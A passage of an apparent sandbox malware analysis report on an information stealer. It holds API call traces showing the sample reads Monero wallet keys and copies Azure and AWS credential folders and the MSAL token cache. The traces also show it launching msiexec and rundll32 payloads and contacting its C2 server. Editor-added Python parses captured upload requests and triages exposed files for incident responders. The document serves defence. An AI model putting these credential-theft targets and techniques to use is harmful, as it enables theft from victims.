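        if chunk.startswith(b"--"):  # closing delimiter, nothing follows
            break
        chunk = chunk.lstrip(b"\r\n")
        part_head, sep, content = chunk.partition(b"\r\n\r\n")
        if not sep:
            continue  # malformed part without a blank line; skip it
        # The CRLF before the next delimiter belongs to the framing, not the content.
        if content.endswith(b"\r\n"):
            content = content[:-2]
        name_m = re.search(rb'name="([^"]*)"', part_head)
        file_m = re.search(rb'filename="([^"]*)"', part_head)
        name = name_m.group(1).decode("latin-1") if name_m else ""
        filename = file_m.group(1).decode("latin-1") if file_m else None
        parts.append((name, filename, content))
    return parts


def extract_form_fields(raw_request: bytes) -> Dict[str, Part]:
    """Convenience wrapper: raw request bytes -> {field name: part}."""
    head, body = split_request(raw_request)
    return {p[0]: p for p in parse_multipart(body, boundary_from_headers(head))}


if __name__ == "__main__":
    for name, filename, content in extract_form_fields(SAMPLE_REQUEST).values():
        label = f"{name} ({filename})" if filename else name
        print(f"{label}: {len(content)} bytes")
        print(content.decode("utf-8", errors="replace"))
```

When the capture holds the real request, the `file` part is the exfiltrated archive or text record and the other fields are the victim identifiers the stealer sends alongside it; dumping them this way gives the scope of the exposure without replaying anything to the C2.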
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034CF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0034D0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0034D0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D208
                            • lstrcat.KERNEL32(?,00361478), ref: 0034D217
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D22A
                            • lstrcat.KERNEL32(?,0036147C), ref: 0034D239
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D24C
                            • lstrcat.KERNEL32(?,00361480), ref: 0034D25B
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D26E
                            • lstrcat.KERNEL32(?,00361484), ref: 0034D27D
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D290
                            • lstrcat.KERNEL32(?,00361488), ref: 0034D29F
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D2B2
                            • lstrcat.KERNEL32(?,0036148C), ref: 0034D2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 0034D2D4
                            • lstrcat.KERNEL32(?,00361490), ref: 0034D2E3
                              • Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
                              • Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885
                            • lstrlen.KERNEL32(?), ref: 0034D32A
                            • lstrlen.KERNEL32(?), ref: 0034D339
                              • Part of subcall function 0035AA70: StrCmpCA.SHLWAPI(00FB9918,0034A7A7,?,0034A7A7,00FB9918), ref: 0035AA8F
                            • DeleteFileA.KERNEL32(00000000), ref: 0034D3B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: 98fd154c3290806baf3ecfb263412e2c641a2a631e9a95af4a1e7e5185117c18
                            • Instruction ID: 6cc70c54176aee171ee1e01ad9cdcad9908209247e721559581d962d8a02548d
                            • Opcode Fuzzy Hash: 98fd154c3290806baf3ecfb263412e2c641a2a631e9a95af4a1e7e5185117c18
                            • Instruction Fuzzy Hash: 95E123719105089BDB06EBA0DD96EEE7778BF14301F104255F907BB0A1EF35AA0DEB62
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FBD378,00000000,?,0036144C,00000000,?,?), ref: 0034CA6C
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0034CA89
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0034CA95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0034CAA8
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0034CAD9
                            • StrStrA.SHLWAPI(?,00FBD288,00360B52), ref: 0034CAF7
                            • StrStrA.SHLWAPI(00000000,00FBD3A8), ref: 0034CB1E
                            • StrStrA.SHLWAPI(?,00FBDB00,00000000,?,00361458,00000000,?,00000000,00000000,?,00FB98C8,00000000,?,00361454,00000000,?), ref: 0034CCA2
                            • StrStrA.SHLWAPI(00000000,00FBDB20), ref: 0034CCB9
                              • Part of subcall function 0034C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0034C871
                              • Part of subcall function 0034C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0034C87C
                            • StrStrA.SHLWAPI(?,00FBDB20,00000000,?,0036145C,00000000,?,00000000,00FB9908), ref: 0034CD5A
                            • StrStrA.SHLWAPI(00000000,00FB97E8), ref: 0034CD71
                              • Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B46), ref: 0034C943
                              • Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B47), ref: 0034C957
                              • Part of subcall function 0034C820: lstrcat.KERNEL32(?,00360B4E), ref: 0034C978
                            • lstrlen.KERNEL32(00000000), ref: 0034CE44
                            • CloseHandle.KERNEL32(00000000), ref: 0034CE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: 10d42148a7489d9cb3a2c1a739ac8f782f5897011eb568e1ff776c007043f135
                            • Instruction ID: 78869cfef26208ae8beba1c1cf30f449c263a22489987602f966919f9a5a9575
                            • Opcode Fuzzy Hash: 10d42148a7489d9cb3a2c1a739ac8f782f5897011eb568e1ff776c007043f135
                            • Instruction Fuzzy Hash: 47E1F271910508ABDB16EBA0DC95FEEB778BF14301F404259F9067B1A1EF306A4EEB61
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • RegOpenKeyExA.ADVAPI32(00000000,00FBB2E8,00000000,00020019,00000000,003605B6), ref: 003583A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
                            • wsprintfA.USER32 ref: 00358459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0035847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0035848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00358499
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 668604be8fc7f475443f4dbc3e06e63a4d51f948aec766f4b138cae27a69b9c3
                            • Instruction ID: 64e09cb10532675955416ba166dd4172111353a768a202743fd145ba21c65c0d
                            • Opcode Fuzzy Hash: 668604be8fc7f475443f4dbc3e06e63a4d51f948aec766f4b138cae27a69b9c3
                            • Instruction Fuzzy Hash: 6C812D7191011CABEB29DB50CC91FEAB7B8FF18701F008299E909A6150DF756B89DFA1
                            APIs
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00354DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00354DCD
                              • Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
                              • Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943
                            • lstrcat.KERNEL32(?,00000000), ref: 00354E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00354E59
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
                              • Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
                              • Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92
                            • lstrcat.KERNEL32(?,00000000), ref: 00354EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00354EE5
                              • Part of subcall function 00354910: wsprintfA.USER32 ref: 003549B0
                              • Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,003608D2), ref: 003549C5
                              • Part of subcall function 00354910: wsprintfA.USER32 ref: 003549E2
                              • Part of subcall function 00354910: PathMatchSpecA.SHLWAPI(?,?), ref: 00354A1E
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,00FBE8E8), ref: 00354A4A
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FF8), ref: 00354A5C
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A70
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FFC), ref: 00354A82
                              • Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A96
                              • Part of subcall function 00354910: CopyFileA.KERNEL32(?,?,00000001), ref: 00354AAC
                              • Part of subcall function 00354910: DeleteFileA.KERNEL32(?), ref: 00354B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: edeb8cb788e2cb21778635a583bb2b200bfc4e4f5cb0857c547bc66e0cc59f40
                            • Instruction ID: 9df7d16568f9bd1365522a4dbe87656185509a057c8722e2541d842716c7d0f2
                            • Opcode Fuzzy Hash: edeb8cb788e2cb21778635a583bb2b200bfc4e4f5cb0857c547bc66e0cc59f40
                            • Instruction Fuzzy Hash: 8C41D4BA95020867DB15F760EC47FED3378AB24705F004594B9896A0C5FEB46BCC9BA2
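The routine above targets cloud CLI credential material: it appends `\.azure\`, `\.aws\` and `\.IdentityService\` to a folder resolved through SHGetFolderPathA, enumerates each directory with FindFirstFileA/FindNextFileA against `*.*`, filters entries with PathMatchSpecA, and copies matches with CopyFileA (with bFailIfExists set) into paths built from `Azure\.azure`, `Azure\.aws` and `Azure\.IdentityService`, which the string set suggests are the staging subfolders; a DeleteFileA follows in the same loop. The string `msal.cache` names the MSAL token cache file. The Python below is an added triage helper, not code from the sample: it lists the files in those directories on a host, with size and SHA-256, and a note on what to revoke. The CSIDL value 0x1C (CSIDL_LOCAL_APPDATA) visible in the shared helper at 00358DE0 may not be the one used at this call site, so both the profile root and LOCALAPPDATA are checked; that choice, the `HOME` fallback for non-Windows hosts and the revocation hints are the editor's assumptions.

```python
"""Triage helper: list the cloud-credential files the traced routine would have reached.

Added example for incident responders; not code from the analysed sample.
"""
import fnmatch
import hashlib
import os
from pathlib import Path
from typing import Dict, Iterable, List

# Directory names appended by the traced code (from the report's string list).
HUNTED_DIRS = [".azure", ".aws", ".IdentityService"]
# File specs visible in the trace: "*.*" for the directory listing and "msal.cache".
# Which one feeds PathMatchSpecA is not resolved in the report, so both are used.
HUNTED_SPECS = ["*.*", "msal.cache"]
# Editor's assumptions about what lives in each folder and what to revoke.
REVOCATION_HINTS = {
    ".aws": "AWS CLI credentials/config: rotate the IAM access keys stored there",
    ".azure": "Azure CLI profile and token cache: revoke refresh tokens / sessions",
    ".IdentityService": "MSAL token cache used by Microsoft tooling: revoke refresh tokens",
}


def candidate_roots() -> List[Path]:
    """Roots the stealer could have resolved via SHGetFolderPathA.

    The AWS and Azure CLIs keep their files under the profile root; the trace
    shows CSIDL_LOCAL_APPDATA (0x1C) in a shared helper, so both are checked.
    HOME is a fallback for running this on a mounted image from a non-Windows host.
    """
    roots: List[Path] = []
    for var in ("USERPROFILE", "LOCALAPPDATA", "HOME"):
        val = os.environ.get(var)
        if val and Path(val) not in roots:
            roots.append(Path(val))
    return roots


def matches_spec(name: str, spec: str) -> bool:
    """Approximate PathMatchSpecA: on Windows "*.*" matches every file, dot or not."""
    if spec == "*.*":
        return True
    return fnmatch.fnmatch(name, spec)


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for block in iter(lambda: fh.read(1 << 16), b""):
            h.update(block)
    return h.hexdigest()


def find_exposed_cloud_material(roots: Iterable[Path]) -> List[Dict[str, str]]:
    """Return every file directly under <root>/<hunted dir> matching the hunted specs.

    FindFirstFileA/FindNextFileA with "*.*" lists one directory level and the trace
    shows no recursion into subfolders, so this walk is non-recursive as well.
    """
    hits: List[Dict[str, str]] = []
    for root in roots:
        for dname in HUNTED_DIRS:
            d = root / dname
            if not d.is_dir():
                continue
            for entry in sorted(d.iterdir()):
                if not entry.is_file():
                    continue
                if any(matches_spec(entry.name, spec) for spec in HUNTED_SPECS):
                    hits.append({
                        "path": str(entry),
                        "size": str(entry.stat().st_size),
                        "sha256": sha256_of(entry),
                        "hint": REVOCATION_HINTS[dname],
                    })
    return hits


if __name__ == "__main__":
    for hit in find_exposed_cloud_material(candidate_roots()):
        print(f"{hit['sha256']}  {hit['size']:>8}  {hit['path']}")
        print(f"    -> {hit['hint']}")
```

Run it under the affected user's context (or with the user's profile mounted and the three environment variables pointed at it). Every file it lists should be treated as disclosed; the hashes let the responder match the copies against anything recovered from the staging folder or from network captures.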
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0035906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                             • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: 813014bc94cbd3130b8a0471f8668d1cd679302ce8c202f73d42ea34207e858d
                            • Instruction ID: 00c54de52472c1af8619b29a67ec44cc24e5eb1e9bf51613a645cfcb687d5a5e
                            • Opcode Fuzzy Hash: 813014bc94cbd3130b8a0471f8668d1cd679302ce8c202f73d42ea34207e858d
                            • Instruction Fuzzy Hash: 2D71DC71910208EBDB04DFE4DC89FEEB7B8BB58701F108509F915AB294DB34A949DB61
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003531C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 0035335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003534EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: d13fb5f86b875b8ce5e323329895a82a49a5eb6682a90b9b2cc2ffc6f28a51cd
                            • Instruction ID: 73736bfba19736b72ac644e659882f13e1e9abfd61435ea787e933adc3174d80
                            • Opcode Fuzzy Hash: d13fb5f86b875b8ce5e323329895a82a49a5eb6682a90b9b2cc2ffc6f28a51cd
                            • Instruction Fuzzy Hash: C912F1718005189ADB1AEBA0DC92FDEB778BF14301F504259F9067A1A1EF742B4EDF52
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 00346280: InternetOpenA.WININET(00360DFE,00000001,00000000,00000000,00000000), ref: 003462E1
                              • Part of subcall function 00346280: StrCmpCA.SHLWAPI(?,00FBE858), ref: 00346303
                              • Part of subcall function 00346280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00346335
                              • Part of subcall function 00346280: HttpOpenRequestA.WININET(00000000,GET,?,00FBE2E0,00000000,00000000,00400100,00000000), ref: 00346385
                              • Part of subcall function 00346280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003463BF
                              • Part of subcall function 00346280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003463D1
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00355318
                            • lstrlen.KERNEL32(00000000), ref: 0035532F
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00355364
                            • lstrlen.KERNEL32(00000000), ref: 00355383
                            • lstrlen.KERNEL32(00000000), ref: 003553AE
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
